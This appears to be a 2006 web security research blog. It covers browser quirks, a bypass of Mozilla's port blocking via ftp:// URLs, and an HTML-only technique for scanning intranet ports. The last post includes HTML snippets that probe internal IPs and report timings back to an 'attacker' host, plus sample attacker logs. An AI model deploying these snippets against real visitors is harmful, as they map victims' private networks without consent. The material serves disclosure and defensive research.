We're seeing more statistics and reviews released to the public. This is great news because it helps us all understand more about what’s going on, what’s working, and what’s not. The benefit of assessing hundreds of websites every month is you get to see vulnerability metrics as web applications change. The hardest part is pulling out the data that's meaningful. If anyone has ideas for stats they’d like to see, let us know. In the meantime, I’ll post some of the graphics below, enjoy!

The types of vulnerabilities we focus on (vulnerability stack) and the level of comprehensiveness (technical vulnerabilities and business logic flaws)


How bad is it out there? 8 out and 10 websites are vulnerable, but how severe are they.



The likelihood of a website having a high or medium severity vulnerability, by class.




Blocking META refresh with LINK tags

While researching Browser Port Scanning without JavaScript, I wanted to find a way to get the browser to kill its connections and move on to the next IP Address. Similar to JavaScript Port Scanning with window.stop() since the timeout period is quite long and needed to speed the process. I figured a meta refresh was the way to go after waiting 5 seconds. Like so:

<* head>
<* meta http-equiv="refresh" content="5;url=http://foo/">
<* /head>

<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />

What I found was that while the LINK HTTP request is waiting, META refreshes won’t fire until is resolved. Weird. Again, I don’t know how this is useful, yet, but it could be for something in the future.

Bypassing Mozilla Port Blocking

To protect against the HTML Form Protocol Attack, which would allow the browser to send arbitrary data to most TCP ports, Mozilla restricted connections to several dozen ports. For example, click on http://jeremiahgrossman.blogspot.com:22/ See the screen shot:



I think it was RSnake who found this first, but the blocking mechanism seems to be only applied to the http protocol handler. Odd. Using the ftp protocol handler, we can bypass the block like so: ftp://jeremiahgrossman.blogspot.com:22/ If the port is up, it'll connect, if not, timeout.

I believe this technique could be used to improve JavaScript Port Scanning, where we’re currently only scanning horizontally for web servers (80/443). Instead we may be able to perform vertical port scans on the remaining ports and bypass the imposed restrictions. Perhaps also useful for the Browser Port Scanning without JavaScript technique.

SCRIPT tag JavaScript error message suppression

While researching different hacks and attack/defense techniques, it’s common to uncover odd behavior in software, especially in web browsers. I’ve also found various oddities point me in the direction of a vulnerabilities or sometimes tricks that become useful as part of another hack. Anyway, here’s some strangeness in Firefox that other might find interesting.

Use a SCRIPT tag to SRC in any invalid file type, like an image.

<* script src="1.jpg"><* /script>




To suppress the error message, use a type attribute with any value:

<* script src="1.jpg" type="put_anything_here"><* /script>

How is this useful? I don't know, but its weird eh?

More to come.

Tuesday, November 28, 2006

Browser Port Scanning without JavaScript

Update 2: Ilia Alshanetsky has already found a way to improve upon the technique using the obscure content-type "multipart/x-mixed-replace". There's a great write up and some PHP PoC code to go with it. Good stuff! RSnake has been covering the topic as well.

Update
: A sla.ckers.org project thread has been created to exchange results. Already the first post has some interesting bits.

Since my Intranet Hacking Black Hat (Vegas 2006) presentation, I've spent a lot of time researching HTML-only browser malware since many experts now disable JavaScript. Imagine that! Using some timing tricks, I "think" I've discovered a way to perform Intranet Port Scanning with a web browser using only HTML. Unfortunately time constraints are preventing me from finishing the proof-of-concept code anytime soon. Instead of waiting I decided to describe the idea so maybe others could try it out. Here's how its supposed to work... there are the two important lines of HTML:

HTML is hosted on an "attacker" control website.
<* link rel="stylesheet" type="text/css" href="http://192.168.1.100/" />
<* img src="http://attacker/check_time.pl?ip=192.168.1.100&start= epoch_timer" />

The LINK tag has the unique behavior of causing the browser (Firefox) to stop parsing the rest of the web page until its HTTP request (for 192.168.1.100) has finished. The purpose of the IMG tag is as a timer and data transport mechanism back to the attacker. One the web page is loaded, at some point in the future a request is received by check_time.pl. By comparing the current epoch to the initial “epoch_timer” value (when the web page was dynamically generated) its possible to tell if the host is up. If the time difference is less than say 5 seconds then likely the host is up, if more, then the host is probably down (browser waited for timeout). Simple.

Example (attacker web server logs)

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762279
(3 second delay) - Host is up

/check_time.pl?ip=192.168.1.100&start=1164762276
Current epoch: 1164762286
(10 second delay) - Host is down

A few browser/network nuances have caused stability and accuracy headaches, plus the technique is somewhat slow to scan with. To fork the connections I used multiple IFRAMES HTML connections, which seemed to work.

<* iframe src="/portscan.pl?ip=192.168.201.100" scrolling="no"><* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.101" scrolling="no">
<* /iframe>
<* iframe src="/portscan.pl?ip=192.168.201.102" scrolling="no">
<* /iframe>

I'm pretty sure most of the issues can be worked around, but like I said, I lack the time. If anyone out there takes this up as a cause, let me know, I have some Perl scraps if you want them.